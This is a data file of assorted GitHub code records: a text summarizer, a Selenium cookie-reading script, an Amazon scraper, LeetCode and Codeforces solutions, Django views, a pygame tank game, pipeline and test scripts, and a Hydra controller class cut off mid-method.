Python) - {deets}\".format(deets = sys.argv[2]))\nf2.savefig(\"perf_plots/\" + sys.argv[3] + \"_log.png\")\nf2.show()\n","repo_name":"jeremiah-corrado/chapel_barba_navier_stokes","sub_path":"perf_data_plotting.py","file_name":"perf_data_plotting.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4929108562","text":"#imports for summarizer\nimport re\nimport nltk\nimport heapq\nfrom nltk import sent_tokenize, word_tokenize\n\n#imports for gensim\nimport gensim \n\ndef summarizer(article_text, num_sentences):\n\t# Removing Square Brackets and Extra Spaces\n\tarticle_text = re.sub(r'\\[[0-9]*\\]', ' ', article_text)\n\tarticle_text = re.sub(r'\\s+', ' ', article_text)\n\n\t# Removing special characters and digits\n\tformatted_article_text = re.sub('[^a-zA-Z]', ' ', article_text )\n\tformatted_article_text = re.sub(r'\\s+', ' ', formatted_article_text)\n\n\tsentence_list = sent_tokenize(article_text)\n\n\n\tstopwords = nltk.corpus.stopwords.words('english')\n\n\tword_frequencies = {}\n\tfor word in word_tokenize(formatted_article_text):\n\t\tif word not in stopwords:\n\t\t if word not in word_frequencies.keys():\n\t\t word_frequencies[word] = 1\n\t\t else:\n\t\t word_frequencies[word] += 1\n\n\tmaximum_frequncy = max(word_frequencies.values())\n\n\tfor word in word_frequencies.keys():\n\t\tword_frequencies[word] = (word_frequencies[word]/maximum_frequncy)\n\n\tsentence_scores = {}\n\tfor sent in sentence_list:\n\t\tfor word in word_tokenize(sent.lower()):\n\t\t\tif word in word_frequencies.keys():\n\t\t\t\tif len(sent.split(' ')) < 30:\n\t\t\t\t\tif sent not in sentence_scores.keys():\n\t\t\t\t\t\tsentence_scores[sent] = word_frequencies[word]\n\t\t\t\t\telse:\n\t\t\t\t\t\tsentence_scores[sent] += word_frequencies[word]\n\n\tsummary_sentences = heapq.nlargest(num_sentences, sentence_scores, key=sentence_scores.get)\n\n\tsummary = ' '.join(summary_sentences)\n\treturn summary\n\ndef textrank(content):\n\tfor ratio in [0.3, 0.5, 0.7]:\n\t summarized_content = gensim.summarization.summarize(content, ratio=ratio)\n\t print('---> Summarized Content (Ratio is %.1f):' % ratio)\n\t print(summarized_content)\n\n\tfor word_count in [10, 30, 50]:\n\t summarized_content = gensim.summarization.summarize(content, word_count=word_count)\n\t print('---> Summarized Content (Word Count is %d):' % word_count)\n\t print(summarized_content)\n","repo_name":"Ro297/Text-Summarizer","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13638677578","text":"# encoding=utf-8\nfrom selenium import webdriver\nfrom selenium.webdriver import DesiredCapabilities\n\nlocal_ip = '10.200.1.59'\n\ndriver = webdriver.Remote (command_executor=local_ip + ':4444/wd/hub', desired_capabilities=DesiredCapabilities.CHROME)\n\n# driver.get ('https://my-st1.orangebank.com.cn/corporbank/netLoanIn.do')\n\n# 获取cookie全部内容\ncookie = driver.get_cookies ()\n\ndriver.delete_all_cookies ()\n# 打印全部cookile信息\nprint (cookie)\n# 打印cookie第一组信息\nprint (cookie[0])\n\ndriver.delete_all_cookies ()\n","repo_name":"WangZhenhai/test_flask","sub_path":"src/del_cookies.py","file_name":"del_cookies.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7099015885","text":"import datetime\nfrom bs4 import 
BeautifulSoup\nimport requests\nimport pandas as pd\nimport re\n\naddress = \"https://www.amazon.com/GLEYEMOR-Polarized-Rectangle-Sunglasses-Glasses/dp/B09WTLW8X2/?_encoding=UTF8&pd_rd_w=vrFLr&content-id=amzn1.sym.9d39c3fa-c33a-4f7a-8d61-434712e0d436&pf_rd_p=9d39c3fa-c33a-4f7a-8d61-434712e0d436&pf_rd_r=S187027ZF410HY2BV6Q6&pd_rd_wg=yokIj&pd_rd_r=018363ee-f550-4085-9f01-40bd452abd49&ref_=pd_gw_bmx_gp_20oqmewn\"\n\n#needs in a dict format (key value pairs)\nheader_values = {\n\n 'Accept':\t'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',\n 'Accept-Encoding': \t'gzip, deflate',\n 'Accept-Language': 'en-US,en;q=0.5',\n 'Connection': \t'keep-alive',\n # no need to specify 'Host ':\t'www.amazon.com',\n 'Referer': \t'https://www.google.com/',\n 'Upgrade-Insecure-Requests': \t'1',\n 'User-Agent':\t'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0'\n\n}\n\n\ndef return_desc(address):\n # calling get method of requests library\n response = requests.get(address, headers=header_values)\n # response hasve an attri called text.encode(\"utf-8\") to read the text.\n response_text = response.text.encode(\"utf-8\")\n soup = BeautifulSoup(response_text, 'lxml')\n descs = soup.find_all(\"div\", {\"id\": \"detailBullets_feature_div\"})\n \n \n #[-4].get_text().strip()\n for d in descs:\n desc = d.find(\"span\", text= re.compile(r'B0', re.DOTALL))\n \n print(desc.text)\n\nreturn_desc(address)\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"70milan/WebscrapingDQ","sub_path":"csvtest/test_1.py","file_name":"test_1.py","file_ext":"py","file_size_in_byte":1519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30721253489","text":"# Approach 1\n# Own Solution\n# O(M+N), O(M+N)\nclass Solution:\n def compareVersion(self, version1: str, version2: str) -> int:\n rev1 = [s.lstrip(\"0\") for s in version1.split(\".\")]\n rev2 = [s.lstrip(\"0\") for s in version2.split(\".\")]\n\n m = min(len(rev1), len(rev2))\n i = 0\n while i < m:\n if rev1[i] == \"\" and rev2[i] == \"\":\n i += 1\n continue\n if rev1[i] == \"\":\n return -1\n if rev2[i] == \"\":\n return 1\n\n if int(rev1[i]) < int(rev2[i]):\n return -1\n if int(rev1[i]) > int(rev2[i]):\n return 1\n i += 1\n\n if len(rev1) < len(rev2):\n while i < len(rev2):\n if rev2[i] != \"\":\n return -1\n i += 1\n\n if len(rev1) > len(rev2):\n while i < len(rev1):\n if rev1[i] != \"\":\n return 1\n i += 1\n\n return 0\n\n\n# Approach 2 - Cleaner code\n# Own Solution\n# O(M+N), O(M+N)\nclass Solution:\n def compareVersion(self, version1: str, version2: str) -> int:\n rev1 = version1.split(\".\")\n rev2 = version2.split(\".\")\n\n m, n = len(rev1), len(rev2)\n i, j = 0, 0\n\n # Padding with Zeros\n if m < n:\n rev1 += [0] * (n-m)\n if n < m:\n rev2 += [0] * (m-n)\n\n while i < max(m, n):\n if int(rev1[i]) < int(rev2[j]):\n return -1\n if int(rev1[i]) > int(rev2[j]):\n return 1\n\n i += 1\n j += 1\n\n return 0\n\n# Approach 3\n# O(M+N), O(1)\nclass Solution:\n def compareVersion(self, version1: str, version2: str) -> int:\n m, n = len(version1), len(version2)\n i, j = 0, 0\n\n while i < m or j < n:\n n1, n2 = 0, 0\n\n while i < m and version1[i] != \".\":\n n1 = n1 * 10 + int(version1[i])\n i += 1\n\n while j < n and version2[j] != \".\":\n n2 = n2 * 10 + int(version2[j])\n j += 1\n\n if n1 < n2:\n return -1\n if n1 > n2:\n return 1\n i += 1\n j += 1\n\n return 
0","repo_name":"nikhiljsk/Strivers_SDE_Sheet","sub_path":"16_String_Part_II/16.6_Compare_version_numbers.py","file_name":"16.6_Compare_version_numbers.py","file_ext":"py","file_size_in_byte":2271,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"42234171030","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.db import *\nimport psycopg2 as p\nfrom .models import Movies\n\ndef init(request):\n command = \"\"\" \\\nCREATE TABLE IF NOT EXISTS public.ex03_movies\n(\n title character varying(64) NOT NULL,\n episode_nb integer NOT NULL,\n opening_crawl text,\n director character varying(32) NOT NULL,\n producer character varying(128) NOT NULL,\n release_date date NOT NULL,\n CONSTRAINT ex03_movies_pkey PRIMARY KEY (episode_nb),\n unique (episode_nb)\n)\n \"\"\"\n # connect to the PostgreSQL server\n conn = p.connect(host=\"localhost\", database=\"djangoformation\", user=\"djangouser\", password=\"secret\")\n try:\n cur = conn.cursor()\n # create table\n res = cur.execute(command)\n # close communication with the PostgreSQL database server\n cur.close()\n # commit the changes\n conn.commit()\n return HttpResponse(\"OK\")\n except (Exception, p.DatabaseError) as error:\n print(error)\n finally:\n if conn is not None:\n conn.close()\n \ndef populate(request):\n try:\n value_list = [ \n (1, 'The Phantom Menace', 'George Lucas', 'Rick McCallum', '1999-05-19'),\n (2, 'Attack of the Clones', 'George Lucas', 'Rick McCallum', '2002-05-16'),\n (3, 'Revenge of the Sith', 'George Lucas', 'Rick McCallum', '2005-05-19'),\n (4, 'A New Hope', 'George Lucas', 'Gary Kurtz, Rick McCallum', '1977-05-25'),\n (5, 'The Empire Strikes Back', 'Irvin Kershner', 'Gary Kutz, Rick McCallum', '1980-05-17'),\n (6, 'Return of the Jedi', 'Richard Marquand', 'Howard G. Kazanjian, George Lucas, Rick McCallum', '1983-05-25'),\n (7, 'The Force Awakens', 'J. J. Abrams', 'Kathleen Kennedy, J. J. Abrams, Bryan Burk', '2015-12-11'),\n ]\n ok = ''\n for record in value_list:\n try:\n old = Movies.objects.get(pk=record[0])\n ok = ok + 'Record (' + record[1] + '):' + \"already exists\" + \"
\"\n except (Movies.DoesNotExist) as error:\n m = Movies(episode_nb=record[0], title=record[1], director=record[2], producer=record[3], release_date=record[4] )\n m.save()\n ok = ok + ' OK
'\n except (Exception, p.DatabaseError) as error:\n ok = ok + 'Error on title(' + record[1] + '):' + str(error.pgcode) + ':' + str(error.pgerror) + \"
\"\n return HttpResponse(ok)\n except (Exception, p.DatabaseError) as error:\n print(error)\n return HttpResponse(\"ERROR\")\n \ndef display(request):\n movies = Movies.objects.all()\n # print(\"movies: {}\".format(movies))\n # print(\"longueur: {}\".format(response.len))\n records = []\n for movie in movies:\n records.append((movie.episode_nb, movie.title, movie.opening_crawl, movie.director, movie.producer, movie.release_date ))\n return render(request, \"display.html\", {'records' : records })","repo_name":"ybaquet/DjangoD05","sub_path":"ex03/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12922290069","text":"import pygame\nimport random\nimport time\nimport os\nfrom pygame import mixer\n\npygame.init()\npygame.font.init()\nwidth, height = 1500, 750\ntank_width, tank_height = 510, 244\nmissile_width, missile_height = 200, 100\nWIN = pygame.display.set_mode((width, height))\npygame.display.set_caption(\"Tank War\")\n\n# main_tank\nmain_tank = pygame.transform.scale(pygame.image.load(os.path.join(\"assets\", \"tank1.png\")), (tank_width, tank_height))\n\n# enemy_tank\nenemy_tank_1 = pygame.transform.scale(pygame.image.load(os.path.join(\"assets\", \"tank2.png\")), (tank_width, tank_height))\nenemy_tank_2 = pygame.transform.scale(pygame.image.load(os.path.join(\"assets\", \"tank3.png\")), (tank_width, tank_height))\nenemy_tank_3 = pygame.transform.scale(pygame.image.load(os.path.join(\"assets\", \"tank4.png\")), (tank_width, tank_height))\nenemy_tank_4 = pygame.transform.scale(pygame.image.load(os.path.join(\"assets\", \"tank5.png\")), (tank_width, tank_height))\n\n# tank_missile\nmain_missile = pygame.transform.scale(pygame.image.load(os.path.join(\"assets\", \"missile.png\")),\n (missile_width, missile_height))\nenemy_missile_1 = pygame.transform.scale(pygame.image.load(os.path.join(\"assets\", \"missile2.png\")),\n (missile_width, missile_height))\nenemy_missile_2 = pygame.transform.scale(pygame.image.load(os.path.join(\"assets\", \"missile3.png\")),\n (missile_width, missile_height))\n\n# background_image\nbg = pygame.transform.scale(pygame.image.load(os.path.join(\"assets\", \"background.jpg\")), (width, height))\n\n# missile_sound\nmissile_sound = pygame.mixer.Sound(\"sound\\missile.wav\")\n\n# tank moving sound\ntank_moving_sound = pygame.mixer.Sound(\"sound\\Tank.wav\")\n\n# explosion sound\nexplosion_sound = pygame.mixer.Sound(\"sound\\explosion.wav\")\n\n\n# missile\nclass Missile:\n def __init__(self, x, y, img):\n self.x = x\n self.y = y\n self.img = img\n self.mask = pygame.mask.from_surface(self.img)\n\n def draw(self, window):\n window.blit(self.img, (self.x, self.y))\n\n def move(self, vel):\n self.x += vel\n\n def off_screen(self, breadth):\n return not (breadth >= self.x >= 0)\n\n def collision(self, obj):\n return collide(self, obj)\n\n\n# abstract class\nclass Tank:\n COOLDOWN = 100\n\n def __init__(self, x, y, health=100):\n self.x = x\n self.y = y\n self.health = health\n self.tank_img = None\n self.missile_img = None\n self.missiles = []\n self.cool_down_counter = 0\n\n def draw(self, window):\n # pygame.draw.rect(window, (255, 0, 0), (self.x, self.y, 50, 50) )\n window.blit(self.tank_img, (self.x, self.y))\n for missile in self.missiles:\n missile.draw(window)\n\n def move_missile(self, vel, obj):\n self.cooldown()\n for missile in self.missiles:\n\n missile.move(vel)\n if missile.off_screen(width):\n 
self.missiles.remove(missile)\r\n            elif missile.collision(obj):\r\n                obj.health -= 10\r\n                explosion_sound.play()\r\n                self.missiles.remove(missile)\r\n\r\n    def cooldown(self):\r\n        if self.cool_down_counter >= self.COOLDOWN:\r\n            self.cool_down_counter = 0\r\n        elif self.cool_down_counter > 0:\r\n            self.cool_down_counter += 1\r\n\r\n    def shoot(self):\r\n        if self.cool_down_counter == 0:\r\n            missile = Missile(self.x + self.get_width(), self.y + 50, self.missile_img)\r\n            self.missiles.append(missile)\r\n            self.cool_down_counter = 1\r\n\r\n    def get_width(self):\r\n        return self.tank_img.get_width()\r\n\r\n    def get_height(self):\r\n        return self.tank_img.get_height()\r\n\r\n\r\nclass Player(Tank):\r\n    score = 0\r\n\r\n    def __init__(self, x, y, health=100):\r\n        super().__init__(x, y, health)\r\n        self.tank_img = main_tank\r\n        self.missile_img = main_missile\r\n        self.mask = pygame.mask.from_surface(self.tank_img)\r\n        self.max_health = health\r\n\r\n    def move_missile(self, vel, objs):\r\n        self.cooldown()\r\n        for missile in self.missiles:\r\n            missile.move(vel)\r\n            if missile.off_screen(width):\r\n                self.missiles.remove(missile)\r\n            else:\r\n                for obj in objs:\r\n                    if missile.collision(obj):\r\n                        self.score += 1\r\n                        explosion_sound.play()\r\n                        objs.remove(obj)\r\n                        if missile in self.missiles:\r\n                            self.missiles.remove(missile)\r\n\r\n    def missile_collision(self, mobjs):\r\n        for missile in self.missiles:\r\n            for obj in mobjs:\r\n                if missile.collision(obj):\r\n                    explosion_sound.play()\r\n                    mobjs.remove(obj)\r\n                    if missile in self.missiles:\r\n                        self.missiles.remove(missile)\r\n\r\n    def draw(self, window):\r\n        super().draw(window)\r\n        self.health_bar(window)\r\n\r\n    def health_bar(self, window):\r\n        pygame.draw.rect(window, (255, 0, 0),\r\n                         (self.x, self.y + self.tank_img.get_height() + 10, self.tank_img.get_width(), 10))\r\n        pygame.draw.rect(window, (0, 255, 0), (\r\n            self.x, self.y + self.tank_img.get_height() + 10,\r\n            self.tank_img.get_width() * (self.health / self.max_health),\r\n            10))\r\n\r\n\r\nclass Enemy(Tank):\r\n    COLOR_MAP = {\r\n        \"grey\": (enemy_tank_1, enemy_missile_1),\r\n        \"camo\": (enemy_tank_2, enemy_missile_2),\r\n        \"yellow\": (enemy_tank_3, enemy_missile_1),\r\n        \"dark\": (enemy_tank_4, enemy_missile_2)\r\n    }\r\n\r\n    def __init__(self, x, y, color, health=100):\r\n        super().__init__(x, y, health)\r\n        self.tank_img, self.missile_img = self.COLOR_MAP[color]\r\n        self.mask = pygame.mask.from_surface(self.tank_img)\r\n\r\n    def move(self, vel):\r\n        self.x -= vel\r\n\r\n    def shoot(self):\r\n        if self.cool_down_counter == 0:\r\n            missile = Missile(self.x, self.y + 35, self.missile_img)\r\n            self.missiles.append(missile)\r\n            self.cool_down_counter = 1\r\n\r\n\r\ndef collide(obj1, obj2):\r\n    offset_x = obj2.x - obj1.x\r\n    offset_y = obj2.y - obj1.y\r\n    return obj1.mask.overlap(obj2.mask, (offset_x, offset_y)) is not None\r\n\r\n\r\ndef main():\r\n    run = True\r\n    FPS = 60\r\n    clock = pygame.time.Clock()\r\n    level = 0\r\n    lives = 5\r\n    player_vel = 2\r\n    enemy_vel = 1\r\n    missile_vel = 2\r\n    enemies = []\r\n    wave_length = 0\r\n    main_font = pygame.font.SysFont(\"comicsans\", 50)\r\n    lost_font = pygame.font.SysFont(\"comicsans\", 70)\r\n    score_font = pygame.font.SysFont(\"comicsans\", 50)\r\n    win_font = pygame.font.SysFont(\"comicsans\", 70)\r\n    player_tank = Player(0, 370)\r\n    lost = False\r\n    win = False\r\n    lost_count = 0\r\n    win_count = 0\r\n\r\n    def redraw_window():\r\n        WIN.blit(bg, (0, 0))\r\n        level_label = main_font.render(f\"Level: {level}\", 1, (255, 0, 0))\r\n        lives_label = main_font.render(f\"Lives: {lives}\", 1, (255, 0, 0))\r\n        score_label = score_font.render(f\"Score: {player_tank.score}\", 1, (255, 0, 0))\r\n        WIN.blit(level_label, (10, 10))\r\n        WIN.blit(lives_label, (width - lives_label.get_width() - 10, 
10))\n WIN.blit(score_label, (width / 2 - score_label.get_width() / 2, 10))\n player_tank.draw(WIN)\n for enemy in enemies:\n enemy.draw(WIN) # using draw method in tank class\n\n if win:\n win_label = win_font.render(f\"You Win!!!\", 1, (255, 0, 0))\n WIN.blit(win_label, (width / 2 - win_label.get_width() / 2, height / 2))\n\n if lost:\n lost_label = lost_font.render(f\"You Lost!!!\", 1, (255, 0, 0))\n WIN.blit(lost_label, (width / 2 - lost_label.get_width() / 2, height / 2))\n\n pygame.display.update()\n\n while run:\n clock.tick(FPS)\n redraw_window()\n\n if level == 5:\n win = True\n win_count += 1\n\n if win:\n if win_count > FPS * 3:\n run = False\n else:\n continue\n\n if lives <= 0 or player_tank.health <= 0:\n lost = True\n lost_count += 1\n\n if lost:\n if lost_count > FPS * 3:\n run = False\n else:\n continue\n\n if len(enemies) == 0:\n level += 1\n wave_length += 2\n for i in range(wave_length):\n enemy = Enemy(random.randrange(1500, 3000), 370, random.choice([\"grey\", \"camo\", \"yellow\", \"dark\"]))\n enemies.append(enemy)\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n quit()\n\n keys = pygame.key.get_pressed()\n if keys[pygame.K_a] and player_tank.x + player_vel > 0: # left\n # tank_moving_sound.play()\n player_tank.x -= player_vel\n\n if keys[pygame.K_d] and player_tank.x + player_vel < width / 2 - player_tank.get_width(): # right\n # tank_moving_sound.play()\n player_tank.x += player_vel\n\n if keys[pygame.K_SPACE]:\n player_tank.shoot()\n missile_sound.play()\n\n for enemy in enemies[:]:\n enemy.move(enemy_vel)\n enemy.move_missile(-missile_vel, player_tank)\n if random.randrange(0, 4 * FPS) == 1:\n enemy.shoot()\n\n if collide(enemy, player_tank):\n explosion_sound.play()\n player_tank.health -= 10\n enemies.remove(enemy)\n\n elif enemy.x + enemy.get_width() < 0:\n lives -= 1\n enemies.remove(enemy)\n\n player_tank.move_missile(missile_vel, enemies)\n player_tank.missile_collision(enemy.missiles)\n\n\ndef main_menu():\n title_font = pygame.font.SysFont(\"comicsans\", 70)\n run = True\n while run:\n WIN.blit(bg, (0, 0))\n title_label = title_font.render(\"Press the mouse to begin....\", 1, (255, 0, 0))\n WIN.blit(title_label, (width / 2 - title_label.get_width() / 2, height / 2))\n pygame.display.update()\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n run = False\n if event.type == pygame.MOUSEBUTTONDOWN:\n main()\n pygame.quit()\n\n\nmain_menu()\n","repo_name":"neelangshu007/Tank-War","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18646053306","text":"import math\n\nt = int(input())\nfor i in range(t):\n a, b, c = [int(j) for j in input().split()]\n x = (10 ** (a - 1))\n y = (10 ** (b - 1))\n z = 5\n z = z * (10 ** (c - 1))\n print(x, y + z)\n\n\n # first = min(x, y)\n # second = max(x, y)\n # flag = False\n # w = (first + 1) // 10\n # q = (second + 1) // 10\n # print(w, q)\n ","repo_name":"iambiggsharaf/Codeforces_Solutions","sub_path":"1511B.py","file_name":"1511B.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70144701549","text":"################################################################################\n# Gabe Reder\n# gkreder@gmail.com\n# Github version\n################################################################################\nimport sys\nimport 
os\nimport dataset\nimport argparse\nfrom aux import prelim\n################################################################################\n\n\n\nif __name__ != '__main__':\n\tsys.exit()\n\nparser = argparse.ArgumentParser(prog='command')\nsubparsers = parser.add_subparsers()\nsubparsers.required = True\nsubparsers.dest = 'command'\n\n# parser for 'add_data' command\nparser_add_prelim= subparsers.add_parser('add_data', help = 'add input data/observations to db')\nparser_add_prelim.add_argument('-d', '--db', type = str, required = True)\nparser_add_prelim.add_argument('--in_file', '-i', type = str, required = True)\nparser_add_prelim.add_argument('--table_name', '-t', type = str, required = True)\n# parser_add_prelim.add_argument('-o', '--formatted_out_file', type = str, required = True)\n\n# parser for 'add_pids' command\nparser_add_pids = subparsers.add_parser('add_pids', help = 'add input list of pubchem IDs to db and create a formatted input file')\nparser_add_pids.add_argument('-d', '--db', type = str, required = True)\nparser_add_pids.add_argument('--pubchem_dir', '-p', type = str, required = True)\nparser_add_pids.add_argument('-i', '--pids_list', type = str, required = True)\nparser_add_pids.add_argument('-m', '--mode', type = str, required = True, choices = ['string', 'file'])\n\n# parser for 'download_pids' command\nparser_add_pids = subparsers.add_parser('download_pids', help = 'download pids to json')\nparser_add_pids.add_argument('--pubchem_dir', '-p', type = str, required = True)\nparser_add_pids.add_argument('-i', '--pids_list', type = str, required = True)\nparser_add_pids.add_argument('-m', '--mode', type = str, required = True, choices = ['string', 'file'])\n\n# parser for 'check' command\nparser_check = subparsers.add_parser('check', help = 'preliminary Check on input list of knowns')\nparser_check.add_argument('-d', '--db', type = str, required = True)\nparser_check.add_argument('--in_file', '-i', type = str, required = True)\nparser_check.add_argument('--pubchem_dir', '-p', type = str, required = True)\nparser_check.add_argument('-v', '--verbose', action='store_true')\n\n# # parser for 'match_input' command\n# parser_check = subparsers.add_parser('match_input', help = 'add ID labels to input file')\n# parser_check.add_argument('-d', '--db', type = str, required = True)\n# parser_check.add_argument('--knowns_file', '-k', type = str, required = True)\n# parser_check.add_argument('-o', '--out_file', required = True)\n\n\nargs = parser.parse_args()\n\nif args.command == 'add_data':\n\tprelim.add_data(args)\nelif args.command == 'add_pids':\n\tprelim.add_pids(args)\nelif args.command == 'check':\n\tprelim.check(args)\n# elif args.command == 'match_input':\n# \tprelim.match_input(args)\nelif args.command == 'download_pids':\n\tprelim.download_pids(args)\nelse:\n\tsys.exit('Error: Unrecognized command - %s' % args.command)","repo_name":"gkreder/pipeline_scripts","sub_path":"0_prelim_top.py","file_name":"0_prelim_top.py","file_ext":"py","file_size_in_byte":3050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73190047786","text":"import pytest\n\nfrom jarvis.actions import action_registry\nfrom jarvis.nlp.openai import openai_action_resolver as OR\nfrom jarvis.nlp.openai import navigation\n\nfrom pprint import PrettyPrinter\n\npp = PrettyPrinter(indent=2)\n\n\n# NOTE: When openai model \"temperature>0\", these tests will occasionally fail\n# as the model incorporates randomness.\n@pytest.mark.parametrize(\n 
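# (question, expected) pairs: each natural-language command on the left should\n    # resolve to the arrow-separated action chain on the right\n    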
\"question, expected\",\n [\n (\n \"log in to my wall street journal account\",\n \"ChangeURL `www.wsj.com` -> ClickLink `sign in`\"\n ),\n (\n \"goto shopify and create account\",\n \"ChangeURL `shopify.com` -> ClickLink `sign up`\"\n ),\n (\n \"open netflix and login\",\n \"ChangeURL `www.netflix.com` -> ClickLink `sign in`\"\n ),\n (\n \"open target and login\",\n \"ChangeURL `target.com` -> ClickLink `login`\"\n ),\n (\n \"goto tiktok website\",\n \"ChangeURL `tiktok.com`\"\n ),\n (\n \"open circleci select jarvis repo and click staging\",\n \"ChangeURL `circleci.com` -> ClickLink `repository` -> ClickLink `jarvis` -> ClickLink `staging`\"\n )\n ]\n)\ndef test_query_web_navigation_model(question, expected):\n answer = navigation.ask_web_navigation_model(question)\n print(answer)\n assert answer == expected\n\n\n@pytest.mark.parametrize(\n \"answer, expected\",\n [\n (\n \"ChangeURL `www.wsj.com` -> ClickLink `sign in`\",\n [('ChangeURL', 'www.wsj.com'), ('ClickLink', 'sign in')]\n ),\n (\n \"ChangeURL `amazon.com` -> FindSearchBar -> TypeText `ski mask` -> PressKey `enter`\",\n [('ChangeURL', 'amazon.com'), ('FindSearchBar', None), ('TypeText', 'ski mask'), (\"PressKey\", \"enter\")]\n ),\n # (\n # \"ChangeURL `amazon.com` -> FindSearchBar -> \", # Should raise exception but doesn't\n # [('ChangeURL', 'amazon.com'), ('FindSearchBar', None)]\n # ),\n # (\n # \"ChangeURL `amazon.com` FindSearchBar -> \", # Should raise exception but doesn't\n # None,\n # )\n (\n \"`amazon.com` 27862\",\n None, # Indicates raises exception\n ),\n ]\n)\ndef testparse_answer_to_actions(answer, expected):\n if expected is None:\n with pytest.raises(Exception) as excinfo:\n print(excinfo)\n actions = OR.parse_answer_to_actions(answer)\n else:\n actions = OR.parse_answer_to_actions(answer)\n assert actions == expected\n\n\nCMD = \"log in to my wall street journal account\"\nACTIONS = [('ChangeURL', 'www.wsj.com'), ('ClickLink', 'sign in')]\nEXPECTED_CHAIN = {\n 'name': 'log in to my wall street journal account',\n 'phrases': ['log in to my wall street journal account'],\n 'steps': [\n {\n 'class_path': 'jarvis.automation.browser.browser_actions.ChangeURL',\n 'params': {'url': 'www.wsj.com'}\n },\n {\n 'class_path': 'jarvis.automation.browser.browser_actions.ClickLink',\n 'params': {'link_text': 'sign in'}\n }\n ]\n }\n\ndef test_convert_actions_to_chain():\n cmd = CMD\n actions = ACTIONS\n expected = EXPECTED_CHAIN\n action_classes = action_registry.load_action_classes_from_modules(\"jarvis/automation\")\n chain = OR.convert_actions_to_chain(\n cmd=cmd,\n actions=actions,\n action_classes=action_classes\n )\n pp.pprint(chain.to_dict())\n assert chain.to_dict() == expected\n\n\ndef test_infer_action_chain():\n cmd = CMD\n expected = EXPECTED_CHAIN\n action_classes = action_registry.load_action_classes_from_modules(\"jarvis/automation\")\n chain = OR.infer_action_chain(cmd, action_classes)\n pp.pprint(chain.to_dict())\n assert chain.to_dict() == expected\n","repo_name":"cfortuner/jarvis","sub_path":"tests/nlp/openai/test_openai_action_resolver.py","file_name":"test_openai_action_resolver.py","file_ext":"py","file_size_in_byte":3874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2230774780","text":"import math\n\ntotal=0\n\nwith open('data.1') as file:\n filelines= file.readlines()\n print(filelines)\n for i in filelines:\n iszero=False\n f=int(i)\n while iszero == False:\n new_f = (math.floor(f/3)-2)\n f=new_f\n if f <= 0:\n iszero=True\n break\n 
total = total + f\n \n\nprint(total)","repo_name":"Cmorling/advent-of-code-2019","sub_path":"day_one/p2.py","file_name":"p2.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"7289575392","text":"import pandas as pd\nfrom glob import glob\nfrom pathlib import Path\nimport numpy as np\nimport h5py\n\npath= '/workspace/hpv_project/roi_feter_aftr_filter_6/TCGA-CV-5443-01Z-00-DX1.h5'\nslide=path.split('/')[-1].split('.')[0]\nwith h5py.File(path, 'r') as f:\n data = f['coords']\n print(f.keys())\n data_record = {'coords':[]}\n for i in range(len(data)):\n \tdata1= data[i]\n \tdata1=data1.tolist()\n \tprint(data1)\n \tdata_record['coords'].append(data1)\ndf = pd.DataFrame(data_record)\n \t#csv_file=slide+'.csv'\ndf.to_csv('testing_file_before.csv', index=False)\n\n","repo_name":"ravigupta131/Data_play","sub_path":"read_h5.py","file_name":"read_h5.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"75158785386","text":"import os\nimport yaml\nimport torch\nimport torch.nn as nn\nfrom copy import deepcopy\nfrom collections import deque\n\n\nclass Controller:\n \"\"\"\n Hydra's block controller. Stores information about its index in the\n blocks list, the execution chain (blocks that should be executed in\n order before this block), and the children blocks of this block.\n\n Attributes:\n index: the index of this block in the Hydra.blocks\n execution_chain: indices of blocks to be executed prior to this\n parent_index: index (in Hydra.blocks) of the parent block\n children_indices: indices (in Hydra.blocks) of the children blocks\n task_id: if this block is a head, stores the task_id\n serving_tasks: a dict {task_id: serving order index}, filled in build()\n \"\"\"\n def __init__(self, index=None):\n self.index = index\n self.execution_chain = [index]\n self.parent_index = None\n self.children_indices = []\n self.task_id = None\n self.serving_tasks = dict()\n\n def stack_on(self, controller):\n \"\"\"Stacks current controller on top of another controller\"\"\"\n prev_chain = controller.execution_chain.copy()\n self.execution_chain = prev_chain + [self.index]\n self.parent_index = controller.index\n controller.children_indices.append(self.index)\n return self\n\n def __str__(self):\n return '({}): parent={}, children={}, serving=[{}]'.format(\n self.index, self.parent_index, self.children_indices,\n ', '.join(str(task_id) for task_id in self.serving_tasks))\n\n def __repr__(self):\n return str(self)\n\n def serialize(self):\n \"\"\"Serialize to ordinary python's dict object\"\"\"\n return self.__dict__\n\n def deserialize(self, serialized_controller):\n \"\"\"Deserialize from a python's dict object\"\"\"\n for 